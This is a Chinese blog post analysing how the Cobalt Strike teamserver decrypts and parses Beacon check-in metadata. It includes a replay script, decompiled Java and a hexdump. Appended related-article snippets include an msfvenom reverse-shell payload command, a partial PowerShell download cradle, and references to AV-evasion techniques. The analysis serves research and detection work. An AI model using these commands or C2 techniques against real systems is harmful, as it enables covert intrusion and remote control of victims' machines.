CobaltStrike Beacon上线包解析

最新推荐文章于 2025-03-18 16:15:42 发布
最新推荐文章于 2025-03-18 16:15:42 发布
阅读量223 收藏
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44001905/article/details/146052367
版权

beacon上线包

为了方便动态调试,将上线数据进行重放

import requests

url = "http://192.168.110.37/pixel"

headers = {
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)",
    "Accept": "*/*",
    "cookie": "GUUepev9QEIeOLbFgW+Dd7p4k7pR/7I53SDWbSmt0BRBhjritflam/uKtShebvFUZHL136LZcWtAv4haCuZkRB/q7/fK1T2SP3SlAPFs0yfMJ2n1seUw3OcKGcpVelMpL8XEw6FM6LuyYOG7cbIHNGn9dDmq8RDSjZd/YqAHqkY="
    #"cookie": "Fo9SvaBbe7k25AKjov9rE0eP9EaILCM9Kc7X4cqG3rJVDqLJyqjTkwCnfGYM/0nUaRLtLN2MFuQmFm+6oLDS6/HsXQyJmhefb0EnW7T2qcPyR262ZdKLO9BO63Db2pFmvhpib4xEXoMZ+8YI0mB3ze3qPjXVdSjAI3q0Yt43h+U="
}

r = requests.get(url, headers=headers)
print(r.text)
print(r.status_code)

在接收到上线包时,会在beacon/BeanHTTP.java文件中进行解析

public byte[] serve(String var1, String var2, Properties var3, Properties var4) {
   String var5 = ServerUtils.getRemoteAddress(BeaconHTTP.this.c2profile, var3);
    //根据配置文件metadata处理加密数据(配置中为base64,var6中得到解码的数据)
   String var6 = BeaconHTTP.this.c2profile.recover(".http-get.client.metadata", var3, var4, BeaconHTTP.this.getPostedData(var4), var1);
   if (var6.length() != 0 && var6.length() == 128) {
      BeaconEntry var7 = BeaconHTTP.this.controller.process_beacon_metadata(BeaconHTTP.this.listener, var5, CommonUtils.toBytes(var6), (String)null, 0);
      if (var7 == null) {
         MudgeSanity.debugRequest(".http-get.client.metadata", var3, var4, "", var1, var5);
         return new byte[0];
      } else {
         byte[] var8 = BeaconHTTP.this.controller.dump(var7.getId(), 921600, 1048576);
         if (var8.length > 0) {
            byte[] var9 = BeaconHTTP.this.controller.getSymmetricCrypto().encrypt(var7.getId(), var8);
            return var9;
         } else {
            return new byte[0];
         }
      }
   } else {
      CommonUtils.print_error("Invalid session id");
      MudgeSanity.debugRequest(".http-get.client.metadata", var3, var4, "", var1, var5);
      return new byte[0];
   }
}

dns/AsymmetricCrypto.class代码如下

public byte[] decrypt(byte[] var1) {
      byte[] var2 = new byte[0];

      try {
          //RSA解密数据
         synchronized(this.cipher) {
            this.cipher.init(2, this.privatekey);
            var2 = this.cipher.doFinal(var1);
         }
        //校验数据
         DataInputStream var3 = new DataInputStream(new ByteArrayInputStream(var2));
         int var4 = var3.readInt();
         if (var4 != 48879) {//校验魔术头
            System.err.println("Magic number failed :( [RSA decrypt]");
            return new byte[0];
         } else {
            int var5 = var3.readInt();
            if (var5 > 117) {//校验数据长度
               System.err.println("Length field check failed :( [RSA decrypt]");
               return new byte[0];
            } else {
               byte[] var6 = new byte[var5];
               var3.readFully(var6, 0, var5);
               return var6;
            }
         }
      } catch (Exception var8) {
         MudgeSanity.logException("RSA decrypt", var8, false);
         return new byte[0];
      }
   }

decrypt函数功能为RSA解密,校验魔术头和数据长度。

RSA解密后的数据格式如下

00000000: 00 00 BE EF 00 00 00 54  6D E2 6D AD B3 E2 7F 90  .......Tm.m.....
00000010: 8B FD 5F 80 FD AC 29 23  A8 03 A8 03 2A 9E BD F6  .._...)#....*...
00000020: 00 00 0E 4C 00 00 0C 06  01 1D B1 00 00 00 00 75  ...L...........u
00000030: AB 12 45 75 AB 12 22 80  06 A8 C0 57 49 4E 2D 44  ..Eu.."....WIN-D
00000040: 30 43 39 46 4F 54 4A 31  4D 30 09 30 78 31 37 09  0C9FOTJ1M0.0x17.
00000050: 61 72 74 69 66 61 63 74  2E 65 78 65              artifact.exe

beacon/BeaconC2.java的process_beacon_metadata函数

public BeaconEntry process_beacon_metadata(ScListener var1, String var2, byte[] var3, String var4, int var5) {
   //获取解密后的数据(去魔术头和长度)
   byte[] var6 = this.getAsymmetricCrypto().decrypt(var3);
   if (var6 != null && var6.length != 0) {
      String var7 = CommonUtils.bString(var6);
      //beacon生成的16位随机key,用于计算后续下发任务使用的AESKEY和HASHMac
      String var8 = var7.substring(0, 16);
      //编码类型
      String var9 = WindowsCharsets.getName(CommonUtils.toShort(var7.substring(16, 18)));
      String var10 = WindowsCharsets.getName(CommonUtils.toShort(var7.substring(18, 20)));
      //回连的监听器
      String var11 = "";
      BeaconEntry var12;
      if (var1 != null) {
         var11 = var1.getName();
      } else if (var4 != null) {
         var12 = this.getCheckinListener().resolveEgress(var4);
         if (var12 != null) {
            var11 = var12.getListenerName();
         }
      }
      //BeaconEntry函数解析后续的数据
      var12 = new BeaconEntry(var6, var9, var2, var11);
      if (!var12.sane()) {
         CommonUtils.print_error("Session " + var12 + " metadata validation failed. Dropping");
         return null;
      } else {
         this.getCharsets().register(var12.getId(), var9, var10);
         if (var4 != null) {
            var12.link(var4, var5);
         }

         this.getSymmetricCrypto().registerKey(var12.getId(), CommonUtils.toBytes(var8));
         if (this.getCheckinListener() != null) {
            this.getCheckinListener().checkin(var1, var12);
         } else {
            CommonUtils.print_stat("Checkin listener was NULL (this is good!)");
         }

         return var12;
      }
   } else {
      CommonUtils.print_error("decrypt of metadata failed");
      return null;
   }
}

common/BeaconEntry.java的BeaconEntry函数解析后续数据

public BeaconEntry(byte[] var1, String var2, String var3, String var4) {
   boolean var5;
   try {
      DataParser var6 = new DataParser(var1);
      var6.big();
      var6.consume(20);
      //beaconID 4字节
      this.id = Long.toString(CommonUtils.toUnsignedInt(var6.readInt()));
      //beacon进程PID 4字节
      this.pid = Long.toString(CommonUtils.toUnsignedInt(var6.readInt()));
      //端口 2字节
      this.port = Integer.toString(CommonUtils.toUnsignedShort(var6.readShort()));
      //第31位,标志,判断进程是32位还是64位,系统是否为64位
      byte var7 = var6.readByte();
      if (CommonUtils.Flag(var7, 1)) {
         this.barch = "";
         this.pid = "";
         this.is64 = "";
      } else if (CommonUtils.Flag(var7, 2)) {
         this.barch = "x64";
      } else {
         this.barch = "x86";
      }

      this.is64 = CommonUtils.Flag(var7, 4) ? "1" : "0";
      var5 = CommonUtils.Flag(var7, 8);
      //获取系统版本号 第32和33位
      byte var8 = var6.readByte(); //大版本号
      byte var9 = var6.readByte(); //小版本号
      this.ver = var8 + "." + var9;
      //系统构建号 2字节 35
      this.build = var6.readShort();
      //gmh_gpa 4字节 39
      byte[] var10 = var6.readBytes(4);
      //gmh函数地址 4字节 43
      this.ptr_gmh = var6.readBytes(4);
      //gpa函数地址 4字节 47
      this.ptr_gpa = var6.readBytes(4);
      if ("x64".equals(this.barch)) {
         this.ptr_gmh = CommonUtils.join(var10, this.ptr_gmh);
         this.ptr_gpa = CommonUtils.join(var10, this.ptr_gpa);
      }

      this.ptr_gmh = CommonUtils.bswap(this.ptr_gmh);
      this.ptr_gpa = CommonUtils.bswap(this.ptr_gpa);
      var6.little();
      //beacon IP 4字节 51  前51字节固定
      this.intz = AddressList.toIP(CommonUtils.toUnsignedInt(var6.readInt()));
      var6.big();
      if ("0.0.0.0".equals(this.intz)) {
         this.intz = "unknown";
      }
   } catch (IOException var11) {
      MudgeSanity.logException("Could not parse metadata!", var11, false);
      this.sane = false;
      return;
   }

   //剩下的数据为计算机名,用户名和beacon进程名
   String var12 = CommonUtils.bString(Arrays.copyOfRange(var1, 51, var1.length), var2);
   String[] var13 = var12.split("\t");
   if (var13.length > 0) {
      this.comp = var13[0];
   }

   if (var13.length > 1) {
      this.user = var13[1];
   }

   if (var13.length > 2) {
      if (this.isSSH()) {
         this.ver = var13[2];
      } else {
         this.proc = var13[2];
      }
   }

   if (var5) {
      this.user = this.user + " *";
   }

   this.ext = var3;
   this.chst = var2;
   this.lname = var4;
   this.sane = this.sanity();
}
Iam0x17
关注
CobaltStrike之DNS beacon
问题很多的小明
05-29 3087
DNS beacon 实际意义:红蓝对抗中,可以通过DNS的方式通信,流量更加隐秘,躲避agent/DLP的检测,实现相对隐秘的渗透方式。 环境需要: CobaltStrike + 域名 1 域名解析配置 解析过程如下: 第一步:ns1.xxxxx.com-----ns------>ns.xxxxxx.com 第二部:ns.xxxxx.com------A------->VPS地址 2 CS配置 注意:VPS防火墙53端口一定要开启 解析如下: mac:执行命令 dig +trace ns1
Cobalt Strike DNS Beacon 的使用与原理
yyj1781572的博客
11-17 906
Cobalt Strike DNS Beacon 的使用与原理
CobaltStrike逆向学习系列(4):Beacon 上线协议分析
SecSource_Stars的博客
01-10 414
这是[信安成长计划]的第 4 篇文章 关注微信公众号[信安成长计划] 0x00 目录 0x01 Beacon 发送 0x02 TeamServer 处理 0x03 流程图 0x04 参考文章 在上一篇讲解 C2Profile 解析的时候,已经提到过如何断入到真正的 beacon.dll 当中,并且也清楚了它执行时的调用顺序,Beacon 上线的所有流程也都是在第二次主动调用 DLLMain 时执行的。 因为主要说明的是上线流程,功能性的暂且不提,但是中间会穿插 C2Profile 的读取操作。 0x01
cobalt strike之dns 上线(三)
最新发布
2303_78851087的博客
03-18 287
cobalt strike之dns 上线(三)
Cobaltstrike dns上线 (观察流量)
时光凉春衫薄的博客
12-09 5538
今天做了一个cs-dns的上线过程,发现这个上限的方式还是挺隐蔽的。通过ip查询起来的话很难被追溯到。所有的流量全部是通过dns端口来做控制的。 首先通过exe的木马确保上限 然后在被控端端开启wireshark 随后在控制端下一个命令 下面是我在下达命令之后的一个完整流量截图,其中像这种txt api.xxx post.xxxx之类的都是cs在传输数据的特征。 这个图片其实不大,但是用dns的端口去用来传输数据的话这个就很慢了 流量差不多这个地方才结束吧。截取桌面的这个动作差...
CobaltStrike 流量分析与入侵检测
qq_74806534的博客
10-28 1237
ja3 和 ja3s 分别代表 tls 握手阶段的 client-hello、server-hello 的数据集合计算出的哈希值(md5),相同版本相同系统下指纹相同,该特征与操作系统、cobaltstrike 版本有关,profile 文件无法对其修改。JA3S指纹(Just Another SSL/TLS Signature):它是基于服务器在TLS握手过程中发送的服务器Hello消息中的字段值生成的指纹。JA3指纹和JA3S指纹的生成方法类似,都是通过计算握手消息中的字段值的哈希值来生成唯一的指纹。
cobalt strike各种beacon的详解(http/https/tcp)
热门推荐
Shanfenglan's blog
08-06 35万+
Beacon Cobalt strike4.0开始就只有这几种beacon,下面对其进行一一讲述,先得创建对应的listener,之后根据创建好的listener生成木马文件,文件运行后返回对应的beacon,至于beacon到底是个什么东西可以看我的这篇文章。这里我们先讲述几种比较简单的易于理解的beacon。 附录 beacon与c2通信逻辑 1.stager的beacon会先下载完整的payload执行,stage则省略这一步 2.beacon进入睡眠状态,结束睡眠状态后用 http-get方
Cobalt_Strike_beacon免杀上线com_劫持1
08-03
本文将详细解析Cobalt Strike Beacon免杀上线技术中的COM劫持方法,并通过具体步骤进行说明。此方法能够有效地绕过常见的安全防护措施,实现隐蔽的远程控制。 #### 二、模拟攻击环境 - **目标环境**: AV-Server ...
150.网络安全渗透测试—[Cobalt Strike系列]—[DNS Beacon原理/实战测试]
qwsn
03-22 2504
一、DNS Beacon原理 1、DNS Beacon简介 2、DSN Beacon工作原理 二、DNS Beacon实战测试 1、实战测试前提 2、实战测试过程
CobaltStrike的心跳通信
故事讲予风听
07-25 1156
CobaltStrike允许攻击者通过修改配置文件来自定义Beacon的心跳间隔、检查频率等参数,以适应不同的攻击场景和需求。攻击者还可以利用CobaltStrike提供的流量伪装功能来隐藏或伪装Beacon的心跳通信流量,以逃避安全检测。1、cobalt strike malleable C2配置文件:通过cobalt strike maleable C2配置文件可以修改框架内的各种默认值,操作者可以修改Beacon的内存占用,更改其检入的频率等等,甚至可以修改 Beacon的网络流量。
Cobalt Strike中DNS隐蔽隧道的利用,以及使用DLP进行检测.pdf
03-02
现在,无论是开源或者商业套装渗透软件的应用已经得到普及。虽然目前各大安全技术网站有很多入门文章,但来源多为境外翻译加入译者想象,且有不少内容错误凸显译者缺乏实际操作经验。同时,如何利用市面现有产品实施检测的指导文章也凤毛麟角。因此,笔者计划编写系列教程,介绍演示常见外部入侵和内部威胁的手段、战术、以及工具,并给出使用现有成熟产品进行检测和响应的实际方法。
Cobalt Strike DNS Beacon使用
2301_80127209的博客
05-07 1300
大家好,我是掌控安全-念旧,今天教大家使用Cobalt Strike建立DNS隧道需要隐蔽性需要绕过限制性网络(例如防火墙)不需要很快的响应速度响应速度慢(假设,你执行一个whoami,几分钟后才会响应回显结果,这可能会使人抓狂),和打游戏的时候 网太卡是一个道理一种“偷渡”技术,隐蔽性好,在受害主机上不会开放任何端口,可以规避防火墙,并在具有限制性出口控制的网络中建立C2通道DNS隧道的优点DNS隧道的缺点DNS隧道的适用场景。
Cobalt Strike 的 Beacon 使用介绍以及 Profile 文件修改Beacon内存教程
W小哥
08-23 4622
1、内存段是rwx权限2、内存中有 beacon 字符串3、内存中有 ReflectiveLoader 字符串。
Cobalt Strike 的通信过程 & 协议
shawdow_bug的博客
10-29 4088
这是一篇个人学习笔记,想更仔细了解原理,可阅读,主要内容是利用流量分析 Beacon 与 Cobalt Strike 服务端之间的通信过程,包括。当然,流量是加密的,需要一些辅助工具或脚本,其中的功能包括,等等。
Cobaltstrike4.0系列 -- Beacon HTTP
Web安全工具库
06-23 955
讲过去像是在卖惨,讲未来像是在白日做梦,讲现在又像是旁观者迷,迟迟无语,字字苦酸。。。 ---- 网易云热评 一、新建Listeners,点击save 二、利用powershell命令获取目标主机的Beacon 1、选择Attacks--WebDrive-by--ScriptedwebDelivery 2、选择添加的Listener,点击Launch 3、获取powershell的单行指令 powershell.exe -nop -w hidden -c "IEX ((ne...
cobaltstrike dns上线_CS如何配置通过CDN上线
weixin_39994806的博客
11-29 2789
0X00所需域名*1CDN*1VPS*10X01部署域名购买后将DNS更改为CDN服务商的DNS服务器,然后等待生效以CF为例,生效后会给邮箱发一封邮件然后配置解析域名### # @Author : Sp4ce # @Date : 2020-07-15 11:59:42 # @LastEditors : Sp4ce # @Last...
cobaltstrike dns上线_Cobalt Strike备忘录环境搭建与基本功能
weixin_39830175的博客
11-30 822
0x00 简介CobaltStrike是一款常用于后渗透的神器,这个工具以团队作为主体,共享信息,拥有多种协议上线方式,集成了端口转发,端口扫描,socket代理,提权,钓鱼等。除去自身功能外,CobaltStrike还利用了Metasploit和Mimikatz等其他知名工具的功能。0x01 Cobalt Strike 架构文件结构│ agscript 拓展应用的脚本│ c2l...
CobaltStrike使用之如何上线
baidu_38844729的博客
11-22 1586
前言 已经拿到某台肉鸡的web权限,想进行后渗透攻击,进入内网收集信息,我们可以用到cobaltstrike msf反弹shell 1、制作反弹shell-exe文件在这里插入代码片 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.10.10.159 lport=4444 -f exe -o abc.exe lhost:攻击机IP lport:监听端口 2、msf运行命令 msfconsle msf5 > use exploit/mu
使用Go实现CobaltStrike Beacon工具的教程
标题中的“geacon:练习Go编程并在Go中实现CobaltStrikeBeacon”涉及到了两个主要方面:Go语言编程和CobaltStrike这款商业渗透测试工具的使用。而描述中提供了该项目的具体操作步骤,同时也明确提到了该项目仅用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值